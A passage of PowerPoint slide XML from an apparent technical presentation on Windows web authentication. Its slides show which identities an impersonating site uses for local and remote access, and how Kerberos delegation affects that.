                </a:solidFill>
              </a:rPr>
              <a:t>Dom Account: WEB1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497572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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14"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dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and Authorization (Impersonation Model)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 33" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086682" y="1317558"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1596028" y="1795502"/>
            <a:ext cx="2490806" cy="248514"/>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36" name="Picture 10" descr="Desktop PC"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="881648" y="1593634"/>
            <a:ext cx="714380" cy="859865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4409304" y="1970208"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Right Arrow 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788616" y="1708948"/>
            <a:ext cx="2736766" cy="288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8" name="U-Turn Arrow 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4907675" y="1858494"/>
            <a:ext cx="546712" cy="794972"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
              <a:gd name="adj5" fmla="val 928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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68" descr="D:\Aeshen\TechNet 2006\12-December\Msft-longhorn-papers\TDM Deck\Windows Illustration Icons\Internet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3894489" y="2100706"/>
            <a:ext cx="571505" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 69" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503260" y="1314888"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7816206" y="1967538"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="2500306"/>
            <a:ext cx="1061509" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Picture 11" descr="usr"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="819734" y="1954923"/>
            <a:ext cx="379515" cy="575652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="91" name="Group 90"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3673924" y="2420704"/>
            <a:ext cx="469448" cy="285752"/>
            <a:chOff x="3673924" y="2420704"/>
            <a:chExt cx="469448" cy="285752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Flowchart: Preparation 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3673924" y="2420704"/>
              <a:ext cx="428628" cy="285752"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartPreparatio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de-DE" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="TextBox 92"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3690252" y="2453360"/>
              <a:ext cx="453120" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                <a:t>WP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5891428" y="2935284"/>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b="1" i="1" dirty="0">
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Remote access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3270344" y="2935284"/>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GB" b="1" i="1" dirty="0">
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Local access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rounded Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="649260" y="2935284"/>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b="1" i="1" dirty="0">
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Application Identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885078" y="3295546"/>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t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3263994" y="3295546"/>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400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3302920"/>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t>Network Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rounded Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892452" y="3670770"/>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t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rounded Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3271368" y="3670770"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3670770"/>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t>Local Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rounded Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4038406"/>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t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rounded Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4038406"/>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t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="651308" y="4038406"/>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t>Local System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rounded Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4409066"/>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GB" dirty="0"/>
              <a:t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4409066"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rounded Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643934" y="4409066"/>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err="1"/>
              <a:t>ApplicationPoolIdentity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rounded Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885478" y="4786610"/>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GB" dirty="0"/>
              <a:t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rounded Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3264394" y="4786610"/>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t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rounded Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643310" y="4786610"/>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t>Dom Account: WEB1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="1980129"/>
            <a:ext cx="1702164" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Integrated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Impersonation but no Kerberos Delegation)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Content Placeholder 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="5293657"/>
            <a:ext cx="8675720" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="548640" lvl="1" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" lvl="2" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"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a:t>The web site does impersonate the user‘s identity so user’s account is used to local access. As Kerberos Delegation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>not enabled remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access can only be done anonymously.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310334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100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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>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ipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14"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8" grpId="0" animBg="1"/>
      <p:bldP spid="6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Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and Authorization (Kerberos Delegation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 33" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4086682" y="1317558"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1596028" y="1795502"/>
            <a:ext cx="2490806" cy="248514"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 10" descr="Desktop PC"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="881648" y="1593634"/>
            <a:ext cx="714380" cy="859865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4409304" y="1970208"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Right Arrow 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788616" y="1708948"/>
            <a:ext cx="2736766" cy="2880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68" name="U-Turn Arrow 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4907675" y="1858494"/>
            <a:ext cx="546712" cy="794972"/>
          </a:xfrm>
